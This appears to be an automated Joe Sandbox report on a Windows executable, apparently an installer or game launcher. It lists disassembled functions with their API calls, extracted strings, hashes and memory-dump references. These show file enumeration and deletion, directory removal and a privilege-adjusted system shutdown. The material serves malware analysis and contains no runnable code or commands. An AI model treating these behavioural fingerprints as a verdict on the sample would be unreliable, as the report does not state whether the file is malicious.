                                                                                                                                              • String ID: Chinese (Simplified)$Chinese (Traditional)$Czech$Danish$Dutch$English UK$English US$Finnish$French$German$Greek$Hebrew$Hungarian$Italian$Japanese$Korean$PortBrzl$Russian$Spanish$Swedish
                                                                                                                                              • API String ID: 0-733503574
                                                                                                                                              • Opcode ID: 19592bc6a5c2498cad33296640bab84ca89f9eba67d5babf45a1c1a8358e98fb
                                                                                                                                              • Instruction ID: 37a5b3b5c5b6eab396eacb203a264361d5579e56741c889a3fa2050163f780a9
                                                                                                                                              • Opcode Fuzzy Hash: 19592bc6a5c2498cad33296640bab84ca89f9eba67d5babf45a1c1a8358e98fb
                                                                                                                                              • Instruction Fuzzy Hash: 5981481B3125C08AD769877554602BB7FA2ABAB344B1DC0BFC4886B3A2FE654C47C30D
                                                                                                                                              Function 0040A0D8 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 186filesleepCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1B8
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040A1C7
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0040A1F6
                                                                                                                                              • Sleep.KERNEL32(00000064,?,?,?,00000000,00000001), ref: 0040A2E1
                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0040A2EF
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040A2FB
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0040A30A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseNext$DeleteFirstSleep
                                                                                                                                              • String ID: %s\%s$%s\*_inst.exe$Copy %s->%s$Exit runGameSpecificExe$exec: %s with commandline '%s'$runGameSpecificExe
                                                                                                                                              • API String ID: 2815766398-138872489
                                                                                                                                              • Opcode ID: d6e4ad2af80b425a7b5d657036ccc8314ae48001f7a7774f849bb95704826abf
                                                                                                                                              • Instruction ID: 0c91d48e411e499a262bfaaa4cfdbc113dac507737b5f6b4774de972c7e6e324
                                                                                                                                              • Opcode Fuzzy Hash: d6e4ad2af80b425a7b5d657036ccc8314ae48001f7a7774f849bb95704826abf
                                                                                                                                              • Instruction Fuzzy Hash: 5261F872108340ABE720DF60CC45FEB73A8EBC4704F44492EB98957181DB79A609CBAA
                                                                                                                                              Function 00417E90 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 216fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00413B40: LoadLibraryA.KERNEL32 ref: 00413B5A
                                                                                                                                                • Part of subcall function 00413B40: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00413B6A
                                                                                                                                                • Part of subcall function 00413B40: GetSystemDirectoryA.KERNEL32(0045DAF8,00000104), ref: 00413B95
                                                                                                                                                • Part of subcall function 00413B40: GetWindowsDirectoryA.KERNEL32(0045DD08,00000104), ref: 00413BA5
                                                                                                                                                • Part of subcall function 00413B40: GetTempPathA.KERNEL32(00000104,0045DE10), ref: 00413BB5
                                                                                                                                                • Part of subcall function 00414930: LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004149A7
                                                                                                                                                • Part of subcall function 00414930: GetProcAddress.KERNEL32(00000000,CopyFileExA), ref: 004149BC
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00417F1B
                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00417F97
                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 00417FA7
                                                                                                                                              • FindClose.KERNEL32(?), ref: 00417FBA
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00417FEA
                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 0041807D
                                                                                                                                              • FindClose.KERNEL32(?), ref: 00418090
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 004180B9
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0041813E
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00418149
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$CloseFirstNext$AddressDirectoryLibraryLoadProc$DeletePathSystemTempWindows
                                                                                                                                              • String ID: %s\%s$%s\*_uninst.exe
                                                                                                                                              • API String ID: 1160109514-2858441004
                                                                                                                                              • Opcode ID: 8b4f70c65e56db4e043e312d9d4a1811d1f1b2102490617a729a834f26467973
                                                                                                                                              • Instruction ID: 9f6682103830e505521cd8484b6fe5b054a565d779c716c41cdb5f6c531036c0
                                                                                                                                              • Opcode Fuzzy Hash: 8b4f70c65e56db4e043e312d9d4a1811d1f1b2102490617a729a834f26467973
                                                                                                                                              • Instruction Fuzzy Hash: 5681A6B21083445BD324DF60CD45BEBB7ACEBC8714F444D1EF99583181EB789649CBAA
                                                                                                                                              Function 00414380 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 194filesleepCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414422
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041443A
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414494
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004144AC
                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 004144BD
                                                                                                                                              • RemoveDirectoryA.KERNEL32(?), ref: 004144D6
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414552
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 0041456A
                                                                                                                                              • RemoveDirectoryA.KERNEL32(0000005C), ref: 00414585
                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00414594
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$CloseDirectoryFileFirst$Remove$CreateSleep
                                                                                                                                              • String ID: \
                                                                                                                                              • API String ID: 593529018-2967466578
                                                                                                                                              • Opcode ID: cd2a44f3d599598c1fafc9b4c5718adc1c77347e8a239c6df6d9f0cf34f94548
                                                                                                                                              • Instruction ID: 0fb53b54470e76bddbd086c82c8af96ee8b09f8716e29362b9a934bf63ba6167
                                                                                                                                              • Opcode Fuzzy Hash: cd2a44f3d599598c1fafc9b4c5718adc1c77347e8a239c6df6d9f0cf34f94548
                                                                                                                                              • Instruction Fuzzy Hash: 686128352083859FC321CF28D8447EBBBD6ABD6354F084A5DE8D483351DA39D94DCB5A
                                                                                                                                              Function 004069A7 Relevance: 17.7, Strings: 14, Instructions: 233COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @J2G$L$L$NJC7$W$a$a$b$d$i$o$r$r$y
                                                                                                                                              • API String ID: 0-3995663177
                                                                                                                                              • Opcode ID: c44c9c7f934dba0bbc222d2348a9d9c1558ab797c5b79ce742761f6feebedeb4
                                                                                                                                              • Instruction ID: 252a6d8ed46e94f7374cf00b11fef3c12c06f11e1c1bd39a3460dd2fa65f4b0d
                                                                                                                                              • Opcode Fuzzy Hash: c44c9c7f934dba0bbc222d2348a9d9c1558ab797c5b79ce742761f6feebedeb4
                                                                                                                                              • Instruction Fuzzy Hash: 849133A1D142948AF7258B24EC597EB7675EF91300F0440FED44AAB381E27E1F91CB2B
                                                                                                                                              Function 00414C50 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 213fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414CC8
                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00414DDE
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414DED
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00414E00
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Find$File$First$CloseNext
                                                                                                                                              • String ID: *.*$\$\*.*
                                                                                                                                              • API String ID: 2001080981-2301768657
                                                                                                                                              • Opcode ID: 18643ff7272ddd118860804886334b36c9c05837dbd6501abf4df85ba6bf9773
                                                                                                                                              • Instruction ID: a8a72605bd69f8ac0c64504b566f5f70f8f2b3987ac3faeae44afcbdd81da1c4
                                                                                                                                              • Opcode Fuzzy Hash: 18643ff7272ddd118860804886334b36c9c05837dbd6501abf4df85ba6bf9773
                                                                                                                                              • Instruction Fuzzy Hash: 707139711087854BD721CB24A8187FBB7D9EFC2305F14492AEDC597341EB38988A87AA
                                                                                                                                              Function 004135C0 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 143COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Version
                                                                                                                                              • String ID: Microsoft Win32s$Unknown$Windows 2000$Windows 95$Windows 98$Windows ME$Windows NT$Windows XP
                                                                                                                                              • API String ID: 1889659487-1287414207
                                                                                                                                              • Opcode ID: 454356975ecda9a0999586d875334d146cb9ecda42628de8b5ed3d6ee45c621a
                                                                                                                                              • Instruction ID: 975d6d164ef17e93e1c34ab1fc7ce7197d2ce6e84d94eff38267c9a8d95a5eee
                                                                                                                                              • Opcode Fuzzy Hash: 454356975ecda9a0999586d875334d146cb9ecda42628de8b5ed3d6ee45c621a
                                                                                                                                              • Instruction Fuzzy Hash: B3510EFC9063428BC369CF18FC509997BE5EB9A316B05467ED86883372D7309484CB5E
                                                                                                                                              Function 00413845 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 59windowshutdownCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413853
                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0041385A
                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00413874
                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 004138B4
                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004138BE
                                                                                                                                              • GetLastError.KERNEL32(00000400,00000000,00000000,00000000), ref: 004138D4
                                                                                                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000), ref: 004138E2
                                                                                                                                              • LocalFree.KERNEL32(?,?,SHUTDOWN FAILED,00000000), ref: 004138FF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitFormatFreeLastLocalLookupMessageOpenPrivilegePrivilegesValueWindows
                                                                                                                                              • String ID: SHUTDOWN FAILED$SeShutdownPrivilege
                                                                                                                                              • API String ID: 2448987565-1691336667
                                                                                                                                              • Opcode ID: 00f76c3729a2cacb1a0f8653399a7fbaee5448bb748c007c2ebe38eae4308d50
                                                                                                                                              • Instruction ID: 07b04e0414a2500c08cba524246ac508bc9e29567ebddda6aac245e4067d3e71
                                                                                                                                              • Opcode Fuzzy Hash: 00f76c3729a2cacb1a0f8653399a7fbaee5448bb748c007c2ebe38eae4308d50
                                                                                                                                              • Instruction Fuzzy Hash: 4E112EB4248300BBE310DF90DC4AF6BBBA8AB89B42F11451DFA45D61D1DBB495448B2A
                                                                                                                                              Function 00415590 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 450fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
